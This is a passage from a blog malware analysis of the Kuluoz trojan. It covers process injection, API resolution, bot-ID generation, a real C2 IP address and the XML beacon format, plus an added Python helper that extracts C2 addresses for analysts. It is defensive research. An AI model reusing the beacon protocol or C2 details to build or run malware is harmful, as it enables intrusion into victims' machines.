<i><span lang="EN-US" style="font-family: inherit;">GETTING TO “WORK”
(WHERE THE FUN STARTS!):</span></i></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Let’s analyze the code injected into
svchost.exe, shall we?<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kuluoz code is located at 0x00090000.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It starts off by walking the <a href="http://en.wikipedia.org/wiki/Process_Environment_Block">Process
Environment Block</a> (PEB) to obtain the image base address of kernel32.dll
and reach its export table.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A more detailed view of how this is
done is shown in the image below.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA1IwZwSUkap3GNq-73xX7Wehd65_ALhAPB06UOYlwMnFdKKNWIpfTsvjm_vkfGAf_IQY3FlGBdMaJJVo_1Rmb6sJjlx7mYdhXLKU2N3JhW95WS9eoyNjqNHPVDn-iM4btxMfjjodD/s1600/Traversing+PEB+to+get+to+kernel32.dll+exports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA1IwZwSUkap3GNq-73xX7Wehd65_ALhAPB06UOYlwMnFdKKNWIpfTsvjm_vkfGAf_IQY3FlGBdMaJJVo_1Rmb6sJjlx7mYdhXLKU2N3JhW95WS9eoyNjqNHPVDn-iM4btxMfjjodD/s1600/Traversing+PEB+to+get+to+kernel32.dll+exports.png" height="142" width="320" /></span></a></div>
<div align="center" style="margin-bottom: .0001pt; margin: 0in; text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Traversing PEB to get to kernel32.dll exports<o:p></o:p></span></span></i></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It walks the list of loaded module names and
compares the hash of each name against the hash of <i>kernel32.dll</i>,
which is 0x6A4ABC5B. This little PEB-“walking” routine for locating
kernel32.dll has also been used by other malware families such as Zeus.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It looks for the <i>GetProcAddress </i>function and uses it to obtain the addresses of<i> GetModuleHandleA, LoadLibraryA,
ExitProcess, </i>and<i> VirtualAlloc </i>in<i> kernel32.dll, </i>and<i> memset, memcpy </i>and<i> _stricmp </i>in<i> ntdll.dll.<o:p></o:p></i></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It then continues to get addresses of
the following APIs:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For KERNEL32.Dll:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">OpenProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HeapCreate<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateMutexA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetLastError<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetCurrentProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">TerminateProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WideCharToMultiByte<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">OpenEventA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetSystemTimeAsFileTime<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetCurrentProcessId<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">DeleteFileA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Sleep<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetFileInformationByHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ReadFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SetEvent<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ResumeThread<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateProcessA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CreateFileA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WriteFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CloseHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetProcessHeap<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HeapAlloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HeapFree<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetModuleHandleA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetTickCount<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualAlloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VirtualFree<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">LoadLibraryA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetProcAddress<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For ADVAPI32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptDestroyHash<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptEncrypt<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptCreateHash<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptHashData<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptVerifySignatureA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegDeleteKeyA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegCreateKeyA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegSetValueExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegOpenKeyA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegEnumKeyExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegEnumValueA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">GetUserNameA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">LookupAccountNameA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegOpenKeyExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegQueryValueExA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegCloseKey<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptAcquireContextA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">RegDeleteValueA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MD5Init<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MD5Update<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MD5Final<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For SHELL32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SHGetSpecialFolderPathA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For OLE32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CoInitialize<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CoCreateInstance<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For WS2_32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WSAStartup<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WSACleanup<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">inet_addr<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">inet_ntoa<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For WININET.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetCloseHandle<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetReadFile<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HttpSendRequestA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HttpOpenRequestA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetConnectA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">InternetOpenA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For MSVCRT.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">free<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">malloc<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memset<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">wcstombs<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">_wcsicmp<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">mbstowcs<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memcpy<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">For CRYPT32.DLL:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptImportPublicKeyInfo<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptStringToBinaryA<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">CryptDecodeObjectEx<o:p></o:p></span></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Using <i>VirtualAlloc,</i> it allocates a memory region for itself and copies
stubs of its code into it using memcpy.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaUPt3ymgsg7MnnMFuJ7dW5I3_eDgPYG4968slbcj0EN6G1_HQdiYOe20ttIS3uSilF931_-kR5gf5dvWFbkBsGIQX8f6Pomc0GC1yfDeOjO4Ild6HWga7nxZeea-NGRI-sstYSTRY/s1600/Work+function+copied+in+memory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaUPt3ymgsg7MnnMFuJ7dW5I3_eDgPYG4968slbcj0EN6G1_HQdiYOe20ttIS3uSilF931_-kR5gf5dvWFbkBsGIQX8f6Pomc0GC1yfDeOjO4Ild6HWga7nxZeea-NGRI-sstYSTRY/s1600/Work+function+copied+in+memory.png" height="240" width="320" /></span></a></div>
<div align="center" style="margin-bottom: .0001pt; margin: 0in; text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Work Function copied in memory<o:p></o:p></span></span></i></div>
<div align="center" style="margin-bottom: .0001pt; margin: 0in; text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-size: small;">These code stubs belong to the kuluoz
DLL’s exported function named <i>“Work”</i>, which
is called next.</span></span><o:p></o:p></span></div>
</h2>
<h4>
<span style="font-family: inherit;"><span class="Heading3Char"><i><span lang="EN-US">SO WHAT’S INSIDE?</span></i></span><i><span lang="EN-US">:</span></i></span></h4>
<h2>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Inside the “<i>Work”</i> module<i>, </i>the Trojan
again uses <i>GetProcAddress </i>to obtain the
addresses of the following APIs.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">_stricmp<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">strcat<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">strlen<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">strcpy<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">sprintf<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">sscanf<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memset<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">memcpy<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtQueryInformationProcess<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwReadVirtualMemory<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwMapViewOfSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">NtCreateSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwUnmapViewOfSection<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ZwResumeThread<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Once
everything is properly set up, the first thing it does is obtain the user
name of the account currently logged on to Windows using <i>GetUserNameA</i> and retrieve its equivalent
<a href="http://en.wikipedia.org/wiki/Security_Identifier">Security Identifier</a>
(SID). It then reads the Windows installation date from the registry value
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
“InstallDate”.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">All
the gathered data is then hashed with MD5 using the <i>MD5Init, MD5Update </i>and <i>MD5Final </i>functions. The bot uses this MD5 hash
as a unique ID by which the C2 server identifies it.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Each
time it attempts to make a network request to a C2 (command-and-control) server,
it enumerates all the keys under HKEY_CURRENT_USER\Software, decrypts
their values and compares each against the string “You Fag!!!!!”. If a value matches, the data
following that marker string is interpreted as an in_addr struct.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It
then contacts the C2 server at an IP address obtained either from the registry
(as described above) or from a hardcoded IP address stored in the malware body,
RC4-encrypted with a hardcoded key.<o:p></o:p></span></span></div>
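As an added example (not the author's code), the following Python shows how an analyst can recover the two C2 address sources described above: the in_addr that follows the marker string in an already-decrypted HKCU\Software value, and a hardcoded RC4-encrypted address. The registry encryption layer itself is not described on the page and is not modelled; the RC4 key, the encrypted blob and the 10.0.0.2 address are constructed for illustration.

```python
import socket
from typing import List, Optional

# Marker that kuluoz looks for in decrypted HKCU\Software values (from the analysis above).
MARKER = b"You Fag!!!!!"


def c2_from_registry_value(decrypted: bytes) -> Optional[str]:
    """Return the dotted IPv4 address stored as an in_addr right after MARKER.

    Mirrors the malware's check: the value must start with the marker and carry
    at least four bytes after it. A non-matching or truncated value is not a C2
    record and yields None rather than a guessed address.
    """
    if not decrypted.startswith(MARKER):
        return None
    raw = decrypted[len(MARKER):len(MARKER) + 4]
    if len(raw) != 4:
        return None
    # in_addr holds the address in network byte order; inet_ntoa renders it
    # the same way the malware's own inet_ntoa call does.
    return socket.inet_ntoa(raw)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def c2_from_hardcoded(blob: bytes, key: bytes) -> Optional[str]:
    """Decrypt the hardcoded address blob with the recovered RC4 key and check
    that the result is a dotted IPv4 string (inet_addr would reject anything else)."""
    text = rc4(key, blob).rstrip(b"\x00").decode("ascii", errors="replace")
    try:
        socket.inet_aton(text)
    except (OSError, ValueError):
        return None
    return text


def collect_c2_candidates(registry_values: List[bytes],
                          hardcoded: bytes, key: bytes) -> List[str]:
    """Gather every C2 address an infected host could use: registry-sourced
    addresses plus the hardcoded one, with duplicates removed."""
    found: List[str] = []
    for value in registry_values:
        addr = c2_from_registry_value(value)
        if addr and addr not in found:
            found.append(addr)
    fallback = c2_from_hardcoded(hardcoded, key)
    if fallback and fallback not in found:
        found.append(fallback)
    return found


if __name__ == "__main__":
    # Constructed sample data (not taken from a real infection): a decrypted
    # registry value carrying the address seen in the request header, an
    # unrelated value, and a truncated record with only two address bytes.
    sample_values = [
        MARKER + socket.inet_aton("213.21.158.141"),
        b"some unrelated software setting",
        MARKER + b"\xd5\x15",
    ]
    demo_key = b"constructed-demo-key"  # stand-in for the malware's hardcoded key
    hardcoded_blob = rc4(demo_key, b"10.0.0.2")  # stand-in for the encrypted blob
    print(collect_c2_candidates(sample_values, hardcoded_blob, demo_key))
```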
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">As
an example, it uses the following request headers when contacting the C2
server. <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Here,
“<i>67454D7C3015100394CEF4D903E2D5DDDB1FA83AD0”</i>
is the unique ID generated by hashing the user account name, SID and operating
system installation date, and “<i>Host:
213.21.158.141:443”</i> carries the IP address of the C2 server, obtained
either from the registry or from the hardcoded value in the malware body.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpTa1kwj9pYHj6l1ZYInjb1L6UtqBIz7fgIRDQxdO8S5HzXhdbaqnSY8QCl7yBFh_2j10blCu7HJuGkq8Sd6LGhnt0maPbii3d_CtnJZBXRqAmehoxDhzjt6zr_GUrVIqhrYV0gGtw/s1600/Request+header+of+kuluoz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpTa1kwj9pYHj6l1ZYInjb1L6UtqBIz7fgIRDQxdO8S5HzXhdbaqnSY8QCl7yBFh_2j10blCu7HJuGkq8Sd6LGhnt0maPbii3d_CtnJZBXRqAmehoxDhzjt6zr_GUrVIqhrYV0gGtw/s1600/Request+header+of+kuluoz.png" height="133" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal; line-height: 115%;"><span style="font-family: inherit; font-size: small;">Request header of kuluoz<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The content kuluoz sends to a C2
server uses the following XML encapsulation format.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock><o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Where:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">knock = XML top element<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">id = ID string<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">group = group id string<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">src = presence of analysis tools or
sandbox strings<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">transport = reports if kuluoz is running
from a removable drive or not<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">time = time stamp<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">version = bot version<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">status = status of last command<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">debug = OS version and type<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It checks for the presence of the
following analysis-tool window names and registry keys and values, and places the
result in the <src></src> element of its knock data.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
